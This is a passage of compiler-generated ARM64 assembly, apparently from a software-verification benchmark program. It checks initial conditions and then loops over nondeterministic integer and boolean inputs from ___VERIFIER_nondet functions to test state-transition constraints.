LBB1_13:
ldr x8, [sp, #640] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_14
LBB1_14:
ldr x8, [sp, #848] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_15
LBB1_15:
ldr x8, [sp, #776] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_16
LBB1_16:
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_17
LBB1_17:
ldr x8, [sp, #888] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_18
LBB1_18:
ldr x8, [sp, #768] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_19
LBB1_19:
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_20
LBB1_20:
ldr x8, [sp, #928] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_21
LBB1_21:
ldr x8, [sp, #656] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_22
LBB1_22:
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_23
LBB1_23:
ldur x8, [x29, #-248] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_24
LBB1_24:
ldr x8, [sp, #664] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_25
LBB1_25:
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_26
LBB1_26:
ldur x8, [x29, #-216] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_27
LBB1_27:
ldr x8, [sp, #632] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_28
LBB1_28:
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_29
LBB1_29:
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_30
LBB1_30:
ldr x8, [sp, #800] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_31
LBB1_31:
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_32
LBB1_32:
ldur x8, [x29, #-152] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_33
LBB1_33:
ldr x8, [sp, #840] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_34
LBB1_34:
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_35
LBB1_35:
ldr x8, [sp, #832] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_36
LBB1_36:
ldr x8, [sp, #880] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_37
LBB1_37:
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_38
LBB1_38:
ldr x8, [sp, #872] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_39
LBB1_39:
ldr x8, [sp, #920] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_40
LBB1_40:
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_41
LBB1_41:
ldr x8, [sp, #912] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_42
LBB1_42:
ldur x8, [x29, #-256] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_43
LBB1_43:
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_44
LBB1_44:
ldr x8, [sp, #952] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_45
LBB1_45:
ldur x8, [x29, #-224] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_46
LBB1_46:
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_47
LBB1_47:
ldur x8, [x29, #-232] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_48
LBB1_48:
ldur x8, [x29, #-192] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_49
LBB1_49:
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_50
LBB1_50:
ldur x8, [x29, #-200] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_51
LBB1_51:
ldur x8, [x29, #-160] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_52
LBB1_52:
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_53
LBB1_53:
ldur x8, [x29, #-168] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_54
LBB1_54:
ldur x8, [x29, #-128] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_55
LBB1_55:
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_56
LBB1_56:
ldur x8, [x29, #-136] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_57
LBB1_57:
ldur x8, [x29, #-120] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_58
LBB1_58:
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_59
LBB1_59:
ldr x8, [sp, #608] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_60
LBB1_60:
ldr x8, [sp, #600] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_61
LBB1_61:
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_62
LBB1_62:
ldr x8, [sp, #592] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_63
LBB1_63:
ldr x8, [sp, #584] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
stur w9, [x29, #-100] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_69
b LBB1_64
LBB1_64:
ldr x8, [sp, #944] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_68
b LBB1_65
LBB1_65:
ldr x8, [sp, #576] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
mov w9, #0
str w9, [sp, #24] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_67
b LBB1_66
LBB1_66:
ldr x8, [sp, #568] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
str w8, [sp, #24] ; 4-byte Folded Spill
b LBB1_67
LBB1_67:
ldr w8, [sp, #24] ; 4-byte Folded Reload
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB1_68
LBB1_68:
ldr w8, [sp, #28] ; 4-byte Folded Reload
stur w8, [x29, #-100] ; 4-byte Folded Spill
b LBB1_69
LBB1_69:
ldur w8, [x29, #-100] ; 4-byte Folded Reload
and w8, w8, #0x1
stur w8, [x29, #-96]
b LBB1_70
LBB1_70: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_694
b LBB1_71
LBB1_71: ; in Loop: Header=BB1_70 Depth=1
bl ___VERIFIER_nondet_int
ldr x8, [sp, #32] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #40] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #48] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #56] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #64] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #72] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #80] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #88] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #96] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #104] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #112] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #120] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #128] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #136] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
adrp x8, __x_run@GOTPAGE
ldr x8, [x8, __x_run@GOTPAGEOFF]
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #144] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #152] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #160] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #168] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #176] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #184] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #192] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #200] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #208] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #216] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #224] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #232] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #240] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #248] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #256] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #264] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #272] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #280] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #288] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #296] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #304] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #312] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #320] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #328] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #336] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #344] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #352] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #360] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #368] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #376] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #384] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #392] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #400] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #408] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #416] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #424] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #432] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #440] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #448] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #456] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #464] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #472] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #480] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #488] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #496] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #504] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #512] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #520] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #528] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_bool
ldr x8, [sp, #536] ; 8-byte Folded Reload
strb w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #544] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x8, [sp, #552] ; 8-byte Folded Reload
str w0, [x8]
bl ___VERIFIER_nondet_int
ldr x9, [sp, #560] ; 8-byte Folded Reload
ldr x8, [sp, #512] ; 8-byte Folded Reload
str w0, [x9]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_73
b LBB1_72
LBB1_72: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_73
LBB1_73: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #704] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_75
b LBB1_74
LBB1_74: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #696] ; 8-byte Folded Reload
ldr x8, [sp, #152] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_77
b LBB1_75
LBB1_75: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_77
b LBB1_76
LBB1_76: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_77
LBB1_77: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_79
b LBB1_78
LBB1_78: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_80
b LBB1_79
LBB1_79: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #152] ; 8-byte Folded Reload
ldr x8, [sp, #696] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_80
LBB1_80: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_82
b LBB1_81
LBB1_81: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #160] ; 8-byte Folded Reload
ldr x8, [sp, #704] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_82
LBB1_82: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_85
b LBB1_83
LBB1_83: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_85
b LBB1_84
LBB1_84: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #704] ; 8-byte Folded Reload
ldr x8, [sp, #696] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_85
LBB1_85: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_89
b LBB1_86
LBB1_86: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_89
b LBB1_87
LBB1_87: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_89
b LBB1_88
LBB1_88: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_89
LBB1_89: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #200] ; 8-byte Folded Reload
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_94
b LBB1_90
LBB1_90: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_93
b LBB1_91
LBB1_91: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_93
b LBB1_92
LBB1_92: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_94
b LBB1_93
LBB1_93: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_94
LBB1_94: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_97
b LBB1_95
LBB1_95: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_97
b LBB1_96
LBB1_96: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #200] ; 8-byte Folded Reload
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_97
LBB1_97: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_101
b LBB1_98
LBB1_98: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #200] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_101
b LBB1_99
LBB1_99: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_101
b LBB1_100
LBB1_100: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #744] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_101
LBB1_101: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #760] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_103
b LBB1_102
